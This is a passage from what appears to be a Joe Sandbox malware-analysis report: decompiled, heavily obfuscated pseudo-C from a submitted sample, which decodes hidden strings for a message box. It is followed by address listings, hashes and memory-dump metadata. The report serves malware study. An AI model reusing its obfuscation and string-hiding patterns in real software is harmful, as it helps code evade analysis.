								 *(_t872 - 2) =  *(_t872 - 0x80) - 0x6b;
							} else {
								_t663 =  *0x1000ca8; // 0x7b8b5249
								_t892 = _t663 -  *0x1000c88; // 0xa666078f
								if(_t892 > 0) {
									goto L47;
								} else {
									goto L46;
								}
							}
						}
					}
				}
				_t725 =  *(_t872 - 0x20) + 0x373;
				 *(_t872 - 0xb8) = _t725;
				_t863 =  *((intOrPtr*)(_t872 - 0x58));
				_t361 =  *(_t872 - 0x30);
				asm("cdq");
				_t893 = _t725 -  *((intOrPtr*)(_t872 - 0x54));
				if(_t893 > 0 || _t893 >= 0 && _t361 > _t863) {
					_t362 = 0;
					__eflags = 0;
				} else {
					_t362 = 1;
				}
				_t727 = 0 |  *(_t872 - 0x30) - 0x00000054 <= 0x00000000;
				if(_t362 <  *(_t872 - 0x30) - 0x54 <= 0) {
					 *(_t872 - 9) =  *0x1000cd0;
					 *0x1000ca4 =  *0x1000cb4;
				} else {
					asm("cdq");
					 *(_t872 - 0x48) =  *(_t872 - 0x48) - E00ECEE50( *(_t872 - 0x48),  *((intOrPtr*)(_t872 - 0x44)),  *0x1000c9c, _t727);
					asm("sbb [ebp-0x44], edx");
					 *(_t872 - 0xc) = 0x53;
					_t807 =  *(_t872 - 0x24);
					asm("cdq");
					 *0x1000cc0 = _t807 - 0xff34;
					asm("ror byte [eax+eax], 0x1");
					 *0x1000cc4 = _t807;
				}
				_t729 =  *(_t872 - 0x20) + 0x117;
				 *(_t872 - 0xb8) = _t729;
				 *0x1000ca4 = E00EC1700();
				asm("cdq");
				asm("adc edx, 0xcae43");
				if(( !( *0x1000c9f) + 0x0dc8da25 | _t729) != 0) {
				}
				if( *(_t872 - 0xa8) != 0x3b0) {
					 *(_t872 - 0x6c) =  *(_t872 - 0x6c) &  *0x1109ef0;
					 *(_t872 - 0x88) =  *(_t872 - 0x88) -  *(_t872 - 0x78) &  *(_t872 - 0x88);
					 *((char*)(_t872 - 0xfc)) = 0x97;
					 *((char*)(_t872 - 0xfb)) = 0xaf;
					 *((char*)(_t872 - 0xfa)) = 0xb7;
					 *((char*)(_t872 - 0xf9)) = 0xb9;
					 *((char*)(_t872 - 0xf8)) = 0xbc;
					 *((char*)(_t872 - 0xf7)) = 0xc3;
					 *((char*)(_t872 - 0xf6)) = 0x6a;
					 *((char*)(_t872 - 0xf5)) = 0xb0;
					 *((char*)(_t872 - 0xf4)) = 0xab;
					 *((char*)(_t872 - 0xf3)) = 0xbf;
					 *((char*)(_t872 - 0xf2)) = 0xb6;
					 *((char*)(_t872 - 0xf1)) = 0xbe;
					_t865 = 0;
					do {
						_t580 =  *0x1000cc0; // 0xffff970a
						if((_t580 |  *0x1000cc4) == 0) {
							_t734 =  *((intOrPtr*)(_t872 - 7));
							_t373 = _t734;
							asm("cdq");
							__eflags =  *0x1000cbc - _t734;
							if(__eflags < 0) {
								L76:
								_t374 = 0;
								__eflags = 0;
							} else {
								if(__eflags > 0) {
									L75:
									_t374 = 1;
								} else {
									__eflags =  *0x1000cb8 - _t373;
									if( *0x1000cb8 <= _t373) {
										goto L76;
									} else {
										goto L75;
									}
								}
							}
							__eflags =  !_t374;
							if( !_t374 == 0) {
								__eflags =  *0x1000ce0 |  *0x1000ce4;
								if(( *0x1000ce0 |  *0x1000ce4) != 0) {
									_t804 =  *(_t872 - 0x70) &  *0x1000ce0;
									 *0x1000ce0 = E00ECEE50(_t804, 0 &  *0x1000ce4,  *0x1000ce0,  *0x1000ce4);
									 *0x1000ce4 = _t804;
									 *0x1000cd8 =  *(_t872 - 0x40) * 0xffffe4ed;
									_t475 =  *0x1000d20 & 0xffffb755;
									__eflags = _t475;
									 *(_t872 - 0x5c) = _t475;
								}
							} else {
								 *0x1000c84 =  *0x1000c84 + 1;
							}
						} else {
							 *0x1000c84 = 0x9b;
							 *(_t872 - 8) = 1;
						}
						_t735 =  *0x1000d08;
						_t584 =  *0x1000cf4; // 0x2b91c
						asm("cdq");
						_t736 =  *0x1000cf0; // 0xd43579fe
						 *(_t872 - 0xa8) = _t735;
						_t382 = E00ECEE50(_t736, _t584, 0x1faed387, _t540);
						asm("sbb edx, edi");
						_t540 = 0;
						 *0x1000cf4 = 0;
						 *0x1000cf0 = 1;
						if((_t382 -  !( *(_t872 - 2) ^ _t735) | _t736) != 0) {
							 *0x1000cf0 = 0;
						}
						_t586 =  *0x1000ca4; // 0x9b27
						 *0x1000c90 = 0xb8f675f1 - ( *(_t872 - 1) & 0x000000ff);
						_t739 =  *0x1000cdc; // 0x84521e70
						_t865 = _t865 + 1;
						 *0x1000d10 = ( *(_t872 - 1) & 0x000000ff) *  *(_t872 - 0x6c) * ( *0x1000d08 - (0 | ( *(_t872 - 0x24) & 0x0000ffff) == 0x00000000)) * ((( *0x1000c83 & 0x000000ff) + 1) *  *0x1000cb4 +  !(_t586 + _t739));
						 *(_t872 + _t865 * 2 - 0x1ae) = ( *(_t872 + _t865 - 0xfd) & 0x000000ff) - 0x0000004a & 0x000000ff;
						 *0x1000d14 = _t540;
					} while (_t865 < 0xc);
					_t747 = 0x92 - ( *(_t872 - 0xac) ^  *(_t872 - 0xb4));
					_t394 = M01000CB0; // 0x0
					 *(_t872 - 0x194) = _t747;
					 *0x1000cc0 = 2;
					 *0x1000cc4 = _t540;
					_t395 = E00ECEE50(_t394, _t540, 0xbe790e28, 0x61b36);
					 *0x1000d1c = _t747;
					 *0x1000d18 = _t395;
					_t397 =  *0x1000cc0; // 0xffff970a
					_t599 =  *0x1000cc4; // 0xffffffff
					 *0x1000c94 =  *(_t872 - 0x1c) +  *(_t872 - 1) + 1;
					_t751 = _t397 | _t599;
					if(_t751 == 0) {
						_t753 = 1 -  *(_t872 - 0x78);
						asm("sbb eax, ecx");
						_t400 = E00ECEE50(_t753, 0,  *0x1000ca8,  *0x1000cac);
						 *0x1000cac = _t753;
						_t751 =  *0x1000c83 & 0x000000ff;
						M01000CB0 = M01000CB0 ^ _t751;
						__eflags = M01000CB0;
						 *0x1000ca8 = _t400;
					} else {
						if(_t397 != 1 || _t599 != _t540) {
							if(_t397 == 2 && _t599 == _t540) {
								 *(_t872 - 0xbc) = _t540;
								if( *(_t872 - 0x24) != 0) {
									_t641 = 0;
									__eflags = 0;
								} else {
									_t641 = 1;
								}
								 *(_t872 - 0xbc) = _t540;
								if( *(_t872 - 0xb) != 0) {
									_t465 = 0;
									__eflags = 0;
								} else {
									_t465 = 1;
								}
								 *(_t872 - 0x18) = ( *(_t872 - 0x78) - _t641) *  *0x1000d10 * _t465;
								asm("cdq");
								asm("sbb esi, edx");
								_t751 =  *(_t872 - 0x48);
								asm("sbb esi, eax");
								 *(_t872 - 0x48) =  *(_t872 - 0x48) -  *((intOrPtr*)(_t872 - 7)) - _t751;
							}
						} else {
							 *0x1000d18 =  *0x1215420;
							 *0x1000d1c = _t540;
							 *(_t872 - 2) =  *(_t872 - 2) & 0x000000ff &  *(_t872 - 0x80) & 0x0000ffff |  *(_t872 - 2) & 0x000000ff;
							_t751 =  *0x10ae26c;
							 *0x1000d20 =  *0x1000d20 | _t751;
						}
					}
					 *((char*)(_t872 - 0xdc)) = 0xe5;
					 *((char*)(_t872 - 0xdb)) = 0xdd;
					 *((char*)(_t872 - 0xda)) = 0xe5;
					 *((char*)(_t872 - 0xd9)) = 0xe7;
					 *((char*)(_t872 - 0xd8)) = 0xea;
					 *((char*)(_t872 - 0xd7)) = 0xf1;
					_t403 = E00EC1190() & 0x000000ff;
					 *0x1000cd8 = _t403;
					if(_t403 > _t540) {
						asm("cdq");
						 *0x1000d1c = _t540;
						asm("adc edx, [0x1000cbc]");
						 *0x1000cc0 =  !(( *0x1000c83 & 0x000000ff) +  *0x1000cb8);
						 *0x1000cc4 =  !_t751;
						 *0x1000d18 =  *0x1215420;
						 *((intOrPtr*)(_t872 - 0x58)) =  *((intOrPtr*)(_t872 - 0x58)) + 1;
						asm("adc [ebp-0x54], ebx");
					}
					_t603 =  *(_t872 - 0x40);
					 *(_t872 - 0x38) = _t603 + _t603 + _t603 + _t603 + _t603 + _t603 + _t603 + _t603;
					 *(_t872 - 0x34) = ( *(_t872 - 0x3c) << 0x00000020 | _t603) << 3;
					 *0x10ae368 =  *(_t872 - 0x38);
					_t866 = 0;
					do {
						_t756 =  *(_t872 - 0xb);
						_t913 =  *0x1000c9b - _t756; // -28
						if(_t913 >= 0) {
							if( *(_t872 - 1) == 0) {
								_t407 =  *(_t872 - 0x6c);
								_t853 =  *(_t872 - 0x34);
								asm("cdq");
								__eflags = _t407 -  *(_t872 - 0x38);
								if(_t407 !=  *(_t872 - 0x38)) {
									L106:
									 *(_t872 - 0x90) =  *(_t872 - 0x40) +  *0x1000d10 +  *0x1000c84 -  *(_t872 - 1);
									 *(_t872 - 0x2c) =  *(_t872 - 0x2c) - ( *(_t872 - 0x2c) &  *0x1000cf0 & 0x0000ffff);
									 *0x1000ca0 =  *0x1000ca0 +  *(_t872 - 0x7c);
									 *0x1000c9e =  *0x1215420;
									 *0x1000c88 =  *0x1000c88 -  *(_t872 - 0x40);
									asm("sbb [0x1000c8c], eax");
								} else {
									__eflags = _t756 - _t853;
									if(_t756 == _t853) {
										_t633 =  *0x1000c88 |  *0x1000c8c;
										__eflags = _t633;
										 *_t633 =  *_t633 + _t407;
										__eflags =  *_t633;
										if( *_t633 != 0) {
											_t857 =  *(_t872 - 0x74);
											_t413 =  *0x1000c83 & 0x000000ff;
											asm("cdq");
											_t635 =  *(_t872 - 0x78) - _t413;
											__eflags = _t635;
											asm("enter 0xfa1b, 0x8b");
											_push(_t872);
											 *0x3DE8FE44 = _t635;
											 *(_t872 - 0x78) = _t635;
											 *(_t872 - 0x74) = _t857 & _t413;
											 *(_t872 - 0xa) = ( *(_t872 - 0xa) & 0x000000ff) + ( *(_t872 - 0x18) & 0x0000ffff);
											_t414 =  *((intOrPtr*)(_t872 - 4));
											 *0x1000cf0 = 0x73c571ff;
											_t640 = _t414 +  *0x1000cc8 + 1;
											__eflags = _t640;
											 *0x1000cd4 = _t640;
											 *0x1000cf4 = 0;
											_t415 = _t414 + 0x1000cf4;
											__eflags = _t415;
											 *_t640 =  *_t640 + _t415;
											 *_t415 =  *_t415 + _t415;
											 *_t415 =  *_t415 + _t415;
											__eflags =  *_t415;
										}
									} else {
										goto L106;
									}
								}
							} else {
								_t631 =  *0x1000d04; // 0xffffffff
								asm("cdq");
								_t417 =  *0x1000d00; // 0xfffff835
								_t793 = _t756 & _t631;
								 *0x1000d00 = E00ECEE50( *(_t872 - 0x1c) & _t417, _t793, _t417, _t631);
								 *0x1000d04 = _t793;
							}
						}
						 *(_t872 + _t866 * 2 - 0x160) = ( *(_t872 + _t866 - 0xdc) & 0x000000ff) + 0x00000068 & 0x000000ff;
						_t866 = _t866 + 1;
					} while (_t866 < 6);
					_t612 =  *0x1000d00; // 0xfffff835
					 *0x1000ce0 = 2;
					 *0x1000ce4 = 0;
					 *(_t872 - 0x70) = _t612 * 0x6eb594ba;
					_t614 =  *0x1000ce4; // 0x0
					 *0x110030c =  *(_t872 - 0x60);
					_t420 =  *0x1000ce0; // 0x0
					_t762 = _t420 | _t614;
					if(_t762 == 0) {
						 *(_t872 - 0xbc) = 0;
						__eflags =  *(_t872 - 6);
						if( *(_t872 - 6) != 0) {
							_t421 = 0;
							__eflags = 0;
						} else {
							_t421 = 1;
						}
						_t616 =  *0x1000d00 + _t421;
						__eflags = _t616;
						 *(_t872 - 0x24) =  !_t616;
					} else {
						if(_t420 != 1 || _t614 != 0) {
							if(_t420 == 2 && _t614 == 0) {
								_t449 =  *0x1000cdc; // 0x84521e70
								 *(_t872 - 0x60) = ( *(_t872 - 0x68) ^ _t449 ^  *0x1000d00) * (_t449 + 0xffffbb58);
								_t782 =  *0x1000c94; // 0x0
								_t783 = _t782 * 0x2d40daef;
								 *(_t872 - 0x7c) =  *(_t872 - 0x7c) * ( *0x1000cec & 0x0000ffff);
								 *(_t872 - 0x90) = _t783;
								asm("cdq");
								 *(_t872 - 0x38) = ( *(_t872 - 0x84) & 0x0000ffff) + ( *(_t872 - 0x84) & 0x0000ffff) + ( *(_t872 - 0x84) & 0x0000ffff) + ( *(_t872 - 0x84) & 0x0000ffff) + ( *(_t872 - 0x84) & 0x0000ffff) + ( *(_t872 - 0x84) & 0x0000ffff) + ( *(_t872 - 0x84) & 0x0000ffff) + ( *(_t872 - 0x84) & 0x0000ffff);
								 *(_t872 - 0x34) = _t783;
							}
						} else {
							asm("cdq");
							 *0x1000cb8 =  *((intOrPtr*)(_t872 - 4)) - 0x4fef3c23;
							 *0x1000cbc = _t762;
							 *(_t872 - 0x4c) =  *0x1215420;
							 *0x1000cd0 =  *0x1000cd0 +  *0x1000cd0 -  *0x1000ce0;
						}
					}
					 *((short*)(_t872 - 0x154)) =  ~(( *(_t872 - 0xc4) +  *((intOrPtr*)(_t872 - 0xa4))) *  *(_t872 - 0xc4) *  *(_t872 - 0x14) ^ 0x0000701c);
					_t423 = 0x20b;
					do {
						 *(_t872 - 0xb) =  *(_t872 - 0xb) + 1;
						_t423 = _t423 - 1;
					} while (_t423 > 0);
					_t426 = ( *(_t872 - 0x18) & 0x0000ffff |  *0x1000c9a) +  *0x1000c9f;
					 *0x1000c84 = 0;
					if(_t426 != 0) {
						_t867 = 0;
						__eflags = 0;
					} else {
						_t304 = _t426 + 1; // 0x20b
						_t867 = _t304;
					}
					asm("cdq");
					_t773 =  *(_t872 - 0x2c);
					asm("cdq");
					asm("adc edx, [0x1000cc4]");
					_t432 = E00ECEE50(( *(_t872 - 0x18) & 0x0000ffff) + ( *(_t872 - 0xc) & 0x000000ff) + 1,  *(_t872 - 0xc), _t773 +  *0x1000cc0, _t773);
					asm("sbb edx, edi");
					 *0x1000c83 = 1;
					if((_t432 - _t867 | _t773) != 0) {
						 *0x1000c83 = 0;
					}
					if( *0x1000c84 == 0) {
						 *(_t872 - 0x24) = 0x83;
						asm("cdq");
						 *0x1000cc8 = ( *(_t872 - 0x18) & 0x0000ffff) + 0xf;
						_t441 =  *0x1000cd0; // 0x0
						 *0x1000ccc = _t773;
						 *(_t872 - 5) =  *(_t872 - 3) +  *(_t872 - 0x28) + (_t441 & 0x000000e4) - M01000CB0 +  *0x1000cb8 - 0x2d;
						asm("cdq");
						 *(_t872 - 0xa0) =  *(_t872 - 0xa0) -  *0x1000cd0 - 0x3811;
						asm("sbb [ebp-0x9c], edx");
					}
					_t317 = _t872 - 0x160; // 0x60f1ba1c
					_t774 = _t317;
					_t318 = _t872 - 0x1ac; // 0x60f1b9d0
					_t435 = _t318;
					MessageBoxW(GetForegroundWindow(), _t435, _t774, 0x10);
				}
				return 0;
			}

































































































                                              0x00ec603d
                                              0x00ec603f
                                              0x00ec6040
                                              0x00ec6025
                                              0x00000000
                                              0x00ec6042
                                              0x00ec6042
                                              0x00ec6044
                                              0x00000000
                                              0x00ec6046
                                              0x00ec6046
                                              0x00ec604f
                                              0x00ec604f
                                              0x00ec6055
                                              0x00ec6074
                                              0x00ec6042
                                              0x00ec60b4
                                              0x00ec60ba
                                              0x00ec60cc
                                              0x00ec60d2
                                              0x00ec6132
                                              0x00ec6134
                                              0x00ec613d
                                              0x00ec613d
                                              0x00ec6136
                                              0x00ec6136
                                              0x00ec6136
                                              0x00ec6146
                                              0x00ec614f
                                              0x00ec6155
                                              0x00ec6157
                                              0x00ec6162
                                              0x00ec6162
                                              0x00ec6162
                                              0x00ec6159
                                              0x00ec6159
                                              0x00ec615b
                                              0x00000000
                                              0x00ec615d
                                              0x00ec615d
                                              0x00ec615d
                                              0x00ec615b
                                              0x00ec6169
                                              0x00ec6170
                                              0x00ec6176
                                              0x00ec6179
                                              0x00ec617e
                                              0x00ec6186
                                              0x00ec618b
                                              0x00ec618d
                                              0x00ec6193
                                              0x00ec61f0
                                              0x00ec61f9
                                              0x00ec61f9
                                              0x00ec61fb
                                              0x00ec6206
                                              0x00ec6217
                                              0x00ec6218
                                              0x00ec621e
                                              0x00ec6224
                                              0x00ec6224
                                              0x00ec6227
                                              0x00ec622c
                                              0x00ec622c
                                              0x00ec6195
                                              0x00ec61a4
                                              0x00ec61b2
                                              0x00ec61b3
                                              0x00ec61b9
                                              0x00ec61bf
                                              0x00ec61cc
                                              0x00ec61db
                                              0x00ec61db
                                              0x00ec60e5
                                              0x00ec60f2
                                              0x00ec60f5
                                              0x00ec610e
                                              0x00ec6122
                                              0x00ec6124
                                              0x00ec6124
                                              0x00ec6237
                                              0x00ec6240
                                              0x00ec6243
                                              0x00ec6244
                                              0x00ec624a
                                              0x00ec6254
                                              0x00ec6254
                                              0x00ec624c
                                              0x00ec624c
                                              0x00ec6252
                                              0x00ec625b
                                              0x00ec625b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6252
                                              0x00ec625d
                                              0x00ec626a
                                              0x00ec6294
                                              0x00ec629c
                                              0x00ec629e
                                              0x00ec62a3
                                              0x00ec62a5
                                              0x00ec62b5
                                              0x00ec62b9
                                              0x00ec62cd
                                              0x00ec62cd
                                              0x00ec62d1
                                              0x00ec62dc
                                              0x00ec62df
                                              0x00ec62df
                                              0x00ec626c
                                              0x00ec627a
                                              0x00ec627a
                                              0x00ec62f0
                                              0x00ec62f6
                                              0x00ec6313
                                              0x00ec6323
                                              0x00ec632d
                                              0x00ec6332
                                              0x00ec633b
                                              0x00ec634a
                                              0x00ec6352
                                              0x00ec6415
                                              0x00ec641b
                                              0x00ec6463
                                              0x00ec6465
                                              0x00ec6471
                                              0x00ec6483
                                              0x00ec648e
                                              0x00ec6496
                                              0x00ec64a2
                                              0x00ec64a7
                                              0x00ec64b8
                                              0x00ec64be
                                              0x00ec64bf
                                              0x00ec64c2
                                              0x00ec64e8
                                              0x00ec64e8
                                              0x00ec64ea
                                              0x00ec64ea
                                              0x00ec641d
                                              0x00ec6435
                                              0x00ec643b
                                              0x00ec644b
                                              0x00ec644b
                                              0x00ec6358
                                              0x00ec635d
                                              0x00ec6363
                                              0x00ec6368
                                              0x00ec637a
                                              0x00ec637c
                                              0x00ec63eb
                                              0x00ec63f5
                                              0x00ec63fb
                                              0x00ec6404
                                              0x00ec6407
                                              0x00ec637e
                                              0x00ec639d
                                              0x00ec63af
                                              0x00ec63b8
                                              0x00ec63c3
                                              0x00ec63c6
                                              0x00ec63c9
                                              0x00ec63c9
                                              0x00ec637c
                                              0x00ec635d
                                              0x00ec64f8
                                              0x00ec650d
                                              0x00ec6513
                                              0x00ec6521
                                              0x00ec6530
                                              0x00ec6537
                                              0x00ec653c
                                              0x00ec6548
                                              0x00ec6549
                                              0x00ec6556
                                              0x00ec6568
                                              0x00ec656c
                                              0x00ec657f
                                              0x00ec6594
                                              0x00ec6594
                                              0x00ec65a3
                                              0x00ec65af
                                              0x00ec65b5
                                              0x00ec66c2
                                              0x00ec66cb
                                              0x00ec66ce
                                              0x00ec66dd
                                              0x00ec66e0
                                              0x00ec66eb
                                              0x00ec6700
                                              0x00ec6706
                                              0x00ec670c
                                              0x00ec670c
                                              0x00ec65bb
                                              0x00ec65c3
                                              0x00ec65c6
                                              0x00ec65cb
                                              0x00ec65d1
                                              0x00ec65d6
                                              0x00ec65dc
                                              0x00ec65fd
                                              0x00ec6600
                                              0x00ec6603
                                              0x00ec6604
                                              0x00ec660a
                                              0x00ec661d
                                              0x00ec661d
                                              0x00ec661d
                                              0x00ec660c
                                              0x00ec660c
                                              0x00ec6616
                                              0x00ec6616
                                              0x00ec660e
                                              0x00ec660e
                                              0x00ec6614
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6614
                                              0x00ec660c
                                              0x00ec662b
                                              0x00ec6634
                                              0x00ec6636
                                              0x00ec6643
                                              0x00ec664d
                                              0x00ec6651
                                              0x00ec665c
                                              0x00ec6675
                                              0x00ec667a
                                              0x00ec6686
                                              0x00ec66a0
                                              0x00ec66b3
                                              0x00ec66b3
                                              0x00ec65de
                                              0x00ec65de
                                              0x00ec65ee
                                              0x00ec65f5
                                              0x00ec65e0
                                              0x00ec65e0
                                              0x00ec65e6
                                              0x00ec65ec
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec65ec
                                              0x00ec65de
                                              0x00ec65dc
                                              0x00ec65cb
                                              0x00ec6711
                                              0x00ec6717
                                              0x00ec6721
                                              0x00ec6727
                                              0x00ec6728
                                              0x00ec6729
                                              0x00ec672b
                                              0x00ec673a
                                              0x00ec673a
                                              0x00ec6733
                                              0x00ec6733
                                              0x00ec6733
                                              0x00ec6746
                                              0x00ec674b
                                              0x00ec6793
                                              0x00ec6796
                                              0x00ec674d
                                              0x00ec675a
                                              0x00ec6764
                                              0x00ec6767
                                              0x00ec676a
                                              0x00ec676e
                                              0x00ec677a
                                              0x00ec677b
                                              0x00ec677c
                                              0x00ec6780
                                              0x00ec6780
                                              0x00ec679f
                                              0x00ec67a5
                                              0x00ec67b1
                                              0x00ec67bf
                                              0x00ec67c5
                                              0x00ec67cd
                                              0x00ec67cd
                                              0x00ec6822
                                              0x00ec682e
                                              0x00ec6847
                                              0x00ec684d
                                              0x00ec6854
                                              0x00ec685b
                                              0x00ec6862
                                              0x00ec6869
                                              0x00ec6870
                                              0x00ec6877
                                              0x00ec687e
                                              0x00ec6885
                                              0x00ec688c
                                              0x00ec6893
                                              0x00ec689a
                                              0x00ec68a1
                                              0x00ec68b0
                                              0x00ec68b0
                                              0x00ec68bc
                                              0x00ec68d1
                                              0x00ec68da
                                              0x00ec68dd
                                              0x00ec68de
                                              0x00ec68e0
                                              0x00ec68f5
                                              0x00ec68f5
                                              0x00ec68f5
                                              0x00ec68e2
                                              0x00ec68e2
                                              0x00ec68ee
                                              0x00ec68ee
                                              0x00ec68e4
                                              0x00ec68ea
                                              0x00ec68ec
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec68ec
                                              0x00ec68e2
                                              0x00ec68f9
                                              0x00ec68fb
                                              0x00ec690a
                                              0x00ec6910
                                              0x00ec6928
                                              0x00ec6931
                                              0x00ec693c
                                              0x00ec694b
                                              0x00ec6956
                                              0x00ec6956
                                              0x00ec695b
                                              0x00ec695b
                                              0x00ec68fd
                                              0x00ec68fd
                                              0x00ec68fd
                                              0x00ec68be
                                              0x00ec68be
                                              0x00ec68c8
                                              0x00ec68c8
                                              0x00ec6962
                                              0x00ec696c
                                              0x00ec6976
                                              0x00ec6981
                                              0x00ec6989
                                              0x00ec698f
                                              0x00ec699c
                                              0x00ec699e
                                              0x00ec69a2
                                              0x00ec69a8
                                              0x00ec69b2
                                              0x00ec69b4
                                              0x00ec69b4
                                              0x00ec69d7
                                              0x00ec69dd
                                              0x00ec69e3
                                              0x00ec6a02
                                              0x00ec6a20
                                              0x00ec6a35
                                              0x00ec6a3d
                                              0x00ec6a3d
                                              0x00ec6a66
                                              0x00ec6a68
                                              0x00ec6a6f
                                              0x00ec6a76
                                              0x00ec6a80
                                              0x00ec6a86
                                              0x00ec6a8f
                                              0x00ec6a95
                                              0x00ec6aa3
                                              0x00ec6aac
                                              0x00ec6ab2
                                              0x00ec6aba
                                              0x00ec6abc
                                              0x00ec6b8a
                                              0x00ec6b91
                                              0x00ec6ba3
                                              0x00ec6ba8
                                              0x00ec6bae
                                              0x00ec6bb5
                                              0x00ec6bb5
                                              0x00ec6bbb
                                              0x00ec6ac2
                                              0x00ec6ac5
                                              0x00ec6ace
                                              0x00ec6ae0
                                              0x00ec6ae9
                                              0x00ec6af2
                                              0x00ec6af2
                                              0x00ec6aeb
                                              0x00ec6aeb
                                              0x00ec6aeb
                                              0x00ec6af7
                                              0x00ec6aff
                                              0x00ec6b08
                                              0x00ec6b08
                                              0x00ec6b01
                                              0x00ec6b01
                                              0x00ec6b01
                                              0x00ec6b1f
                                              0x00ec6b2f
                                              0x00ec6b32
                                              0x00ec6b34
                                              0x00ec6b3c
                                              0x00ec6b3e
                                              0x00ec6b41
                                              0x00ec6b49
                                              0x00ec6b57
                                              0x00ec6b65
                                              0x00ec6b6b
                                              0x00ec6b6e
                                              0x00ec6b76
                                              0x00ec6b76
                                              0x00ec6ac5
                                              0x00ec6bc2
                                              0x00ec6bc8
                                              0x00ec6bcf
                                              0x00ec6bd5
                                              0x00ec6bdc
                                              0x00ec6be3
                                              0x00ec6bef
                                              0x00ec6bf6
                                              0x00ec6bfc
                                              0x00ec6c05
                                              0x00ec6c0c
                                              0x00ec6c12
                                              0x00ec6c1a
                                              0x00ec6c26
                                              0x00ec6c2c
                                              0x00ec6c31
                                              0x00ec6c35
                                              0x00ec6c35
                                              0x00ec6c38
                                              0x00ec6c48
                                              0x00ec6c4b
                                              0x00ec6c54
                                              0x00ec6c59
                                              0x00ec6c60
                                              0x00ec6c60
                                              0x00ec6c63
                                              0x00ec6c69
                                              0x00ec6c74
                                              0x00ec6ca8
                                              0x00ec6cae
                                              0x00ec6cb1
                                              0x00ec6cb2
                                              0x00ec6cb4
                                              0x00ec6cba
                                              0x00ec6cd5
                                              0x00ec6ce9
                                              0x00ec6cf7
                                              0x00ec6cfd
                                              0x00ec6d05
                                              0x00ec6d0b
                                              0x00ec6cb6
                                              0x00ec6cb6
                                              0x00ec6cb8
                                              0x00ec6d19
                                              0x00ec6d19
                                              0x00ec6d1d
                                              0x00ec6d1d
                                              0x00ec6d1f
                                              0x00ec6d24
                                              0x00ec6d27
                                              0x00ec6d2e
                                              0x00ec6d2f
                                              0x00ec6d2f
                                              0x00ec6d30
                                              0x00ec6d34
                                              0x00ec6d35
                                              0x00ec6d3b
                                              0x00ec6d40
                                              0x00ec6d4d
                                              0x00ec6d50
                                              0x00ec6d5e
                                              0x00ec6d64
                                              0x00ec6d64
                                              0x00ec6d66
                                              0x00ec6d6d
                                              0x00ec6d6e
                                              0x00ec6d6e
                                              0x00ec6d71
                                              0x00ec6d73
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00ec6cb8
                                              0x00ec6c76
                                              0x00ec6c7d
                                              0x00ec6c83
                                              0x00ec6c86
                                              0x00ec6c8d
                                              0x00ec6c98
                                              0x00ec6c9d
                                              0x00ec6c9d
                                              0x00ec6c74
                                              0x00ec6e5d
                                              0x00ec6e65
                                              0x00ec6e66
                                              0x00ec6e6f
                                              0x00ec6e7d
                                              0x00ec6e87
                                              0x00ec6e8d
                                              0x00ec6e94
                                              0x00ec6e9d
                                              0x00ec6ea2
                                              0x00ec6ea9
                                              0x00ec6eab
                                              0x00ec6f65
                                              0x00ec6f6b
                                              0x00ec6f6d
                                              0x00ec6f76
                                              0x00ec6f76
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f7e
                                              0x00ec6f7e
                                              0x00ec6f82
                                              0x00ec6eb1
                                              0x00ec6eb4
                                              0x00ec6ebd
                                              0x00ec6ed4
                                              0x00ec6ef3
                                              0x00ec6efa
                                              0x00ec6f03
                                              0x00ec6f09
                                              0x00ec6f0c
                                              0x00ec6f22
                                              0x00ec6f23
                                              0x00ec6f26
                                              0x00ec6f26
                                              0x00ec6f2b
                                              0x00ec6f36
                                              0x00ec6f37
                                              0x00ec6f4a
                                              0x00ec6f56
                                              0x00ec6f59
                                              0x00ec6f59
                                              0x00ec6eb4
                                              0x00ec6fa9
                                              0x00ec6fb0
                                              0x00ec6fb5
                                              0x00ec6fb5
                                              0x00ec6fb8
                                              0x00ec6fb9
                                              0x00ec6fd4
                                              0x00ec6fd6
                                              0x00ec6fdc
                                              0x00ec6fe3
                                              0x00ec6fe3
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6ff6
                                              0x00ec6ff9
                                              0x00ec7002
                                              0x00ec7009
                                              0x00ec7013
                                              0x00ec701a
                                              0x00ec701e
                                              0x00ec7025
                                              0x00ec7027
                                              0x00ec7027
                                              0x00ec7035
                                              0x00ec703c
                                              0x00ec704a
                                              0x00ec704b
                                              0x00ec7050
                                              0x00ec705d
                                              0x00ec7081
                                              0x00ec7084
                                              0x00ec7085
                                              0x00ec708b
                                              0x00ec708b
                                              0x00ec7091
                                              0x00ec7091
                                              0x00ec7097
                                              0x00ec7097
                                              0x00ec7872
                                              0x00ec7872
                                              0x00ec7880

                                              APIs
                                              • TlsGetValue.KERNEL32(00000001), ref: 00EC6274
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID: Value
                                              • String ID: %GR$RPSQ8~$S$j
                                              • API String ID: 3702945584-3363877662
                                              • Opcode ID: 5a383489b87c36638c43daecac07343800a255729873994abe3c37d8b8fa3ece
                                              • Instruction ID: 1577fedb891b041e5ba1abee42bcbc71899ec8d0d71309d0f7f430e0a0e11c74
                                              • Opcode Fuzzy Hash: 5a383489b87c36638c43daecac07343800a255729873994abe3c37d8b8fa3ece
                                              • Instruction Fuzzy Hash: 1242D6309042998FCB25CF68D591FFEBBB2FB55344F1491AEE489A734DDA3A4942CB10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

